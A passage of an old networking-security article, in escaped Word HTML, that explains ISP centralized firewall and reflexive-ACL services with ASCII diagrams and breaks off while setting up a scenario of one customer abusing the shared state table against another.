style="font-family: Arial;"&gt;firewall" services to leased line customers. This document is an attempt to&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;highlight problems which may be associated with such a service. Bear in&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;mind that the ideas have not been tested (yet).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;So, what is a centralized firewall service? And what is the idea behind such&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a service? Well, let's talk about the idea first. The "easy" way to add&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;security to a network is to place a firewall between the network to be&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;protected and the open one (the Internet). The problem with this solution&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is that someone has to spend time watching logs, maintaining rules, applying any &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;patches, and keeping the firewall software up-to-date. 
This costs a lot of time, &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;and in most cases, a lot of money (security professionals are usually not &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;cheap these days).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;ISPs know this. They also know that it is unlikely that small and medium-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;sized businesses (SMBs) have the time, money or expertise to invest in such&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;a position. The solution they sell to SMBs is the centralized firewall.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The centralized firewall leaves all the log-watching and maintenance to the &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;ISP, and the ISP provides some sort of report if there is an attack, and &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;usually some sort of weekly or monthly summary (SMB executives like to know&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;how "visible" they are on the 'net).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span 
style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Service types&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;-------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;I know of three types of ISP "firewall" services. One of them is not&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;centralized, so will not be covered here (remote maintenance, where there's a&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;physical firewall at the customer's site, owned and maintained by the ISP).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The two other types are based on a "real" firewall (such as Firewall-1) or&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;by using access-control lists (ACLs). The two figures below outline the &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;(usual) configuration for both solutions. Figure 1 describes the solution &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;using a true firewall, and figure 2 a solution using access-lists. 
The two&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;solutions usually reflect the price of the service. Leased-line customers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;usually have the benefit of a "true" firewall, while dial-up customers are&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;given the ACL option.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;{Internet}&lt;span style=""&gt;    &lt;/span&gt;(5)&lt;span style=""&gt;                       &lt;/span&gt;{Internet}&lt;span style=""&gt;     &lt;/span&gt;(3)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                &lt;/span&gt;|&lt;span style=""&gt;            &lt;/span&gt;&lt;span style=""&gt;                           &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;+-------------+&lt;span style=""&gt;                         &lt;/span&gt;+---------------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;| Core router |&lt;span style=""&gt;  &lt;/span&gt;(4)&lt;span style=""&gt;                    &lt;/span&gt;| Access Router | (2)&lt;span style=""&gt;       &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  
&lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;+-------------+&lt;span style=""&gt;                         &lt;/span&gt;| w/ ACL&lt;span style=""&gt;        &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;               &lt;/span&gt;&lt;span style=""&gt; &lt;/span&gt;|&lt;span style=""&gt;                                &lt;/span&gt;+---------------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;+-------+&lt;span style=""&gt;                             &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;  &lt;/span&gt;ISDN lines&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;| Fire- |&lt;span style=""&gt;   &lt;/span&gt;(3)&lt;span style=""&gt;                       &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;| wall&lt;span style=""&gt;  &lt;/span&gt;|&lt;span style=""&gt;                         &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;|&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;+-------+&lt;span style=""&gt;                         &lt;/span&gt;| Cust |&lt;span style=""&gt;   &lt;/span&gt;|&lt;span style=""&gt;   &lt;/span&gt;| Cust | 
...&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                &lt;/span&gt;|&lt;span style=""&gt;                             &lt;/span&gt;+------+&lt;span style=""&gt;   &lt;/span&gt;|&lt;span style=""&gt;   &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;+--------+&lt;span style=""&gt;                                    &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;| Access |&lt;span style=""&gt;   &lt;/span&gt;(2)&lt;span style=""&gt;              &lt;/span&gt;&lt;span style=""&gt;             &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;| Router |&lt;span style=""&gt;                                 &lt;/span&gt;| Cust | (1)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;           &lt;/span&gt;+--------+&lt;span style=""&gt;                                 &lt;/span&gt;+------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;          &lt;/span&gt;/&lt;span style=""&gt;     &lt;/span&gt;|&lt;span style=""&gt;    &lt;/span&gt;\&lt;span style=""&gt;  &lt;/span&gt;Leased Lines&lt;span style=""&gt;               &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;         &lt;/span&gt;/&lt;span style=""&gt;      &lt;/span&gt;|&lt;span style=""&gt;     &lt;/span&gt;\&lt;span style=""&gt;           
           &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;+------+ +------+ +------+&lt;span style=""&gt;                  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;| Cust | | Cust | | Cust | ...&lt;span style=""&gt;  &lt;/span&gt;(1)&lt;span style=""&gt;               &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;| Rtr&lt;span style=""&gt;  &lt;/span&gt;| | Rtr&lt;span style=""&gt;  &lt;/span&gt;| | Rtr&lt;span style=""&gt;  &lt;/span&gt;|&lt;span style=""&gt;                     &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;+------+ +------+ +------+&lt;span style=""&gt;                &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;             &lt;/span&gt;Figure 1&lt;span style=""&gt;                                 &lt;/span&gt;Figure 2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;As you can see, there is a great deal more hardware involved when involving&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span 
style="font-family: Arial;"&gt;a firewall than just relying on ACLs on the access router (hence the &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;difference in price). Both setups, however, have the same basic functions. In&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;figure 1, the traffic is only allowed to travel in the following manner:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;   &lt;/span&gt;(1) -&gt; (2) -&gt; (3) -&gt; (4)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Policy routing ensures that traffic going from the customer _has_ to pass &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;through the firewall, thus prohibiting inter-customer traffic at level 2.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;In figure 2, one uses "reflexive access-lists" (RACL, introduced in Cisco IOS &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;11.3) to make sure that traffic cannot pass from one customer to another &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;without passing through the ACL. 
TACACS+ or RADIUS determines which customer &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;should have this ACL installed (the ACL is defined in the router &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;configuration, not in the TACACS+ or RADIUS configuration file). Depending on&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;the ISP's setup, either a separate RACL will be installed for each customer,&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;or every customer uses the same RACL. This document assumes the latter.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;It may be possible to use standard (extended) ACLs, but the idea behind RACL &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is that timeouts are introduced in a kind of "state table". 
A standard ACL &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;doesn't have this; it validates packets using static rules.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;For more on RACLs, check out http://www.cisco.com/univercd/cc/td/doc/product/&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;software/ios113ed/113ed_cr/secur_c/scprt3/screflex.htm (no spaces in this&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;URL).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Where is the problem?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;---------------------&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Both the firewall and the router containing the RACL use some form of "state &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;table". 
This table defines what packets have left the inside, and usually&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;contains the following information (at least):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Source IP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Source port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Destination IP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;Destination port&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;The router or firewall determines what packets are allowed through from the&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;outside depending on this table. 
TCP packets destined for the inside cannot &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;have the SYN flag set (unless specified in the filter rule), and are discarded.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;UDP packets are not allowed through unless:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;a) specified in the RACL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;            &lt;/span&gt;b) a UDP packet has been initiated from the inside first AND&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;        &lt;/span&gt;c) the UDP reply has been received within a predefined time limit&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Timers are used to invalidate UDP "sessions", since there is no way of knowing&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;when a UDP session ends (without looking at the overlying protocol).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;This sounds innocuous enough if you are the only user of the firewall 
(this&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;is what happens when you have your own). However, in the above context, several&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;networks share the same firewall, and indeed, the same state table. If we &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;assume that all the customers are Nice(tm), then there shouldn't be a problem.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;We should be paranoid, though, and consider the following scenario. What if&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Customer-2 really dislikes Customer-1? In fact, what if Customer-2 (mean.com)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;dislikes Customer-1 (nice.com) so much that Customer-2 gets in touch with &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;Mr. Evil (evil.org) on the Internet? 
See figure 3 for a quick situation &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;overview.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                                         &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                           &lt;/span&gt;{Internet}----| Mr. Evil | evil.org &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                               &lt;/span&gt;|&lt;span style=""&gt;         &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                               &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;+----------+&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;|&lt;span style=""&gt;  &lt;/span&gt;RACL/&lt;span style=""&gt;   &lt;/span&gt;|&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoPlainText"&gt;&lt;span style="font-family: Arial;"&gt;&lt;span style=""&gt;                          &lt;/span&gt;| 